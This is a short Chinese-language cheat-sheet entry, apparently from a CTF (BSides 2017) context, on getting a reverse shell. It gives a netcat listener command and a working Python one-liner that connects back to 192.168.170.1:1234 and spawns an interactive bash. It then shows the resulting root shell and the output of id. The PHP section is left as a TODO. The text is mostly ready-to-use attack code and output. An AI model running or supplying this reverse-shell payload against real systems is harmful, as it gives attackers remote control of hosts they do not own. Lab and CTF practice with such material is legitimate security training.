另一种反弹shell的方式

参考：
http://zeroyu.xyz/2017/01/21/Commix%E5%91%BD%E4%BB%A4%E8%AF%A6%E8%A7%A3/

Python

先在自己机器上执行

[~]$ nc -vl 192.168.170.1 1234

即在192.168.170.1/24网段上监听1234端口。
然后在target的shell中执行

[~/repos/CTF/BSides-CTF-2017]$ python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.170.1',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

反弹出去一个/bin/bash，然后自己机器上就得到了一个bash。

[~]$ nc -vl 192.168.170.1 1234                                                                                                                      [17:20:18]
root@kali:~/repos/CTF/BSides-CTF-2017#

root@kali:~/repos/CTF/BSides-CTF-2017# id
id
uid=0(root) gid=0(root) groups=0(root)

PHP

//TODO